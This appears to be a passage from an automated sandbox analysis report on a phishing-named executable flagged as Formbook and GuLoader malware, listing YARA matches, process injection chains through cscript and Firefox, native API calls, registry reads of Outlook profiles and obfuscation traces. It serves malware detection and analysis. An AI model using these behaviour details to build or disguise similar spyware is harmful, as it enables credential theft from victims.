        Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5256 -s 284
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00406666
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E5232
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E5E32
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E0C52
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E127A
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E2C72
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E6F18
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E5D12
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E3FA2
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E3FA0
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E61D2
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E77D2
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E61CA
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB4C52
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB527A
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB6C72
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB9232
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB9E32
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDBA1D2
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDBB7D2
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDBA1CA
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB7FA2
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB7FA0
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDBAF18
        Source: C:\Windows\explorer.exeCode function: 7_2_0EDB9D12
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7D480
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCF5C9
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC75C6
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CDA526
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCA6C0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0C6E0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C836EC
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCF6F6
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10680
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBD646
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C34670
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2C600
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAD62C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC6757
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1A760
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C12760
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1B0D0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC70F1
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C4508C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C000A0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBE076
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B1E0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C5717A
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD010E
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAD130
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFD2EC
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC124C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2D210
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BD2245
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C01380
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1E310
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCF330
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C28CDF
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C97CE8
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2FCE0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CDACEB
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CA9C98
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBEC4C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC6C69
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCEC60
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C00C12
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1AC20
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8EC20
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C19DD0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CAFDF4
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C22DB0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC7D4C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10D69
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0AD00
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCFD27
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC9ED2
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C02EE8
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC0EAD
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C11EB2
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C52E48
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C30E50
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CB0E6D
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC1FC6
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C16FE0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCEFBF
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8FF40
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCFF63
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C1CF00
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC18DA
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CC78F3
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C26882
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C898B2
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C19870
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2B870
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C85870
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCF872
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C13800
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E810
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF6868
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CB0835
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C559C0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BD99E8
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0E9A0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCE9A6
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCFA89
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2FAA0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCEA5B
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCCA13
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C84BC0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10B10
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C4DB19
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCFB2E
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00608D90
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00620041
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0060A220
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0060A21C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00603827
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00603830
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061E920
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061F9DA
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00603A50
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00601AD0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00620BE0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00620BEC
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00620E50
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061FFFE
        Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04C45050 appears 36 times
        Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04C57BE4 appears 94 times
        Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04BFB910 appears 250 times
        Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04C7E692 appears 86 times
        Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04C8EF10 appears 94 times
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C434E0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42CF0 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42C30 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42D10 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42E50 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42F00 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C429F0 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42AC0 NtEnumerateValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42A80 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42A10 NtWriteFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42BC0 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42B80 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42B90 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42B00 NtQueryValueKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42B10 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C44570 NtSuspendThread,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C44260 NtSetContextThread,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42CD0 NtEnumerateKey,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C43C90 NtOpenThread,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42C50 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42C10 NtOpenProcess,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42C20 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C43C30 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42DA0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42D50 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42EC0 NtQuerySection,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42ED0 NtResumeThread,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42E80 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42EB0 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42E00 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42FB0 NtSetValueKey,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42F30 NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C438D0 NtGetContextThread,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C429D0 NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42AA0 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42BE0 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C42B20 NtQueryInformationProcess,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C820 NtCreateFile,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C8D0 NtReadFile,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C950 NtClose,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C920 NtDeleteFile,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061CA00 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C8CA NtReadFile,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C94A NtClose,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061C91A NtDeleteFile,
        Source: System.dll.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess Stats: CPU usage > 98%
        Source: System.Security.Cryptography.X509Certificates.dll.1.drStatic PE information: No import functions for PE file found
        Source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000002.6090038594.0000000000469000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000003.6918023032.0000000037A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000000.5906940154.0000000000469000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLIN00178.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edgegdi.dll
        Source: DHLIN00178.exeStatic PE information: invalid certificate
        Source: percentile.dll.1.drStatic PE information: Number of sections : 19 > 10
        Source: libdatrie-1.dll.1.drStatic PE information: Number of sections : 11 > 10
        Source: libpkcs11-helper-1.dll.1.drStatic PE information: Number of sections : 12 > 10
        Source: DHLIN00178.exeVirustotal: Detection: 12%
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile read: C:\Users\user\Desktop\DHLIN00178.exeJump to behavior
        Source: DHLIN00178.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DHLIN00178.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
        Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5256 -s 284
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
        Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\GhettoJump to behavior
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Temp\nsd1F79.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/11@19/17
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00402138 CoCreateInstance,MultiByteToWideChar,
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
        Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: DHLIN00178.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: cscript.pdbUGP source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
        Source: Binary string: mshtml.pdbUGP source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cscript.pdb source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000001.00000002.6092061877.000000000A021000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB72F9 push 3871B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB6CAA push eax; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB60A2 push ds; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB6C66 push eax; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB4A36 push 790893ADh; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB5835 push cs; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB7FDC push eax; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB75B0 push 3B99B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB5992 push ss; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB755E push cs; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB6332 push ebx; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB550B push ds; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_0166755E push cs; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01666332 push ebx; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_0166550B push ds; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01667FDC push eax; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_016675B0 push 3B99B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01665992 push ss; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01666C66 push eax; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01664A36 push 790893ADh; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01665835 push cs; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_016672F9 push 3871B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_016660A2 push ds; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01666CAA push eax; retf
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BD97A1 push es; iretd
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BD21AD pushad ; retf 0004h
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C008CD push ecx; mov dword ptr [esp], ecx
